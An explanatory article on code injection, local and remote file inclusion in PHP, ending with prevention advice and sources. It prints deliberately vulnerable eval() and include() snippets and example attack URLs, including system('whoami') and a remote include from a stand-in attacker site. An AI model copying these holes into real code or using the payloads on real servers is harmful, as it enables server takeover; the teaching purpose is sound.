Code Injection

explanation

Code injection is a general term for types of attacks that involve code injection and occur when an attacker exploits a flaw in the application’s input validation and exploits it to execute malicious code. The code is injected into the target application language and executed by the server-side interpreter for that language and can include PHP, Python, Java, Perl, Ruby, or other server-side programming languages.

 Any application that directly evaluates unvalidated input is vulnerable to code injection, and the allowed characters of each language, format, and data type, as well as the expected size of the data, are among the things that cause this vulnerability. Finding this type of vulnerability may be simple or difficult in various situations, but if it is successfully exploited, the confidentiality, integrity and availability of the data will be lost.

Code injection attacks are different from command injection attacks because in code injection, the attacker is limited to the functionality of the injected language, and if he can inject PHP code into a program and execute it, he is limited to PHP functionality only. As a result, the attacker’s capabilities and access depend on the restrictions imposed on the server-side interpreter, for example PHP, Python, and in some situations the attacker can achieve command injection from code injection. To better understand this difference, here is the source code of a PHP program that has a code injection vulnerability:

/**

* Get the code from a GET input

* Example - http://example.com/?code=phpinfo();

*/

$code = $_GET['code'];

/**

* Unsafely evaluate the code

* Example - phpinfo();

*/

eval("\$code;")

In this example, the attacker can execute his arbitrary PHP codes, and as a result, the PHP information page is displayed.

Here, the attacker can achieve from code injection to command injection by executing arbitrary commands related to the operating system. In this example, the attacker can use the system () function in PHP to execute the whom command.

http://example.com/?code=system(‘whoami’);

Because the attacker was able to execute operating system commands, he/she may try to install a web shell or other malware on the server, or he may be able to infiltrate internal systems and take over them.

LFI and RFI attacks are two attacks from code injection attacks and allow the attacker to add and include a file using the dynamic include mechanisms of files in the target application. These vulnerabilities also occur due to the use of insecure user input.

An LFI attack is the process of including files that already exist locally on the server and are made available by exploiting vulnerable system inputs applied to the application. For example, a web page receives as input the path of a file to be imported, and if this input is not properly validated, this vulnerability occurs and allows directory traversal characters such as dot-dot-slash to be injected. The successful exploitation of this vulnerability can lead to the disclosure of the content of files and the disclosure of sensitive information, but depending on the severity of the existing vulnerability, it can lead to attacks such as code execution on the server, execution of user-side code using JavaScript and the like, and even denial of service attacks.

As another example, consider the following source code written in PHP:

/**

* Get the filename from a GET input

* Example - http://example.com/?file=filename.php

*/

$file = $_GET['file'];

/**

* Unsafely include the file

* Example - filename.php

*/

include('directory/' . $file);

In the above example, the attacker may create a request similar to the following request and force the application to execute the PHP scripts and web shells that the attacker uploaded:

http://example.com/?file=../../uploads/evil.php

RFI attack is the process of including remote files by exploiting unvalidated inputs to the vulnerable system. For example, a web page receives as input the path of a file to be imported, and if this input is not properly validated, this vulnerability occurs and allows the injection of an external URL. Although most examples refer to vulnerable PHP scripts, we must keep in mind that this vulnerability is also common in other technologies such as JSP, ASP, and others.

In the above example, if the program passes a parameter to the include() function in PHP through a GET request without any validation, the attacker may try to execute code that is different from what the programmer had in mind. In the following URL, the name of a page is sent to the include() function:

http://example.com/?page=contact.php

The evilcode.php file may include the phpinfo() function to obtain very useful information about the web server settings and running web services. An attacker can ask the application to execute his code by the following request:

http://example.com/?page=http://evilsite.com/evilcode.php

2 -solutions and prevention

• Do not directly put user input data in file system and APIs and use parameterization if possible.
• Use server-side whitelisting to validate entries.
• Use the appropriate escape structure of the special characters of your programming language to validate user input.
• Do not use functions that have vulnerabilities.
• Do not use functions like eval() and its equivalent functions to process raw and unvalidated user data.
• If you can access the web server settings, disable the functions that you do not need in your application processes.
• Define a whitelist of allowed files to include and reject requests containing illegal file names.
• If possible, use web application firewalls and configure them to control outgoing traffic as well.
• In case of error, use a general message page

3-sources

• https://owasp.org/www-community/attacks/Code_Injection
• https://www.netsparker.com/blog/web-security/code-injection/
• https://owasp.org/www-pdf-archive/OTGv4.pdf
• https://www.acunetix.com/blog/articles/code-injection/
• https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/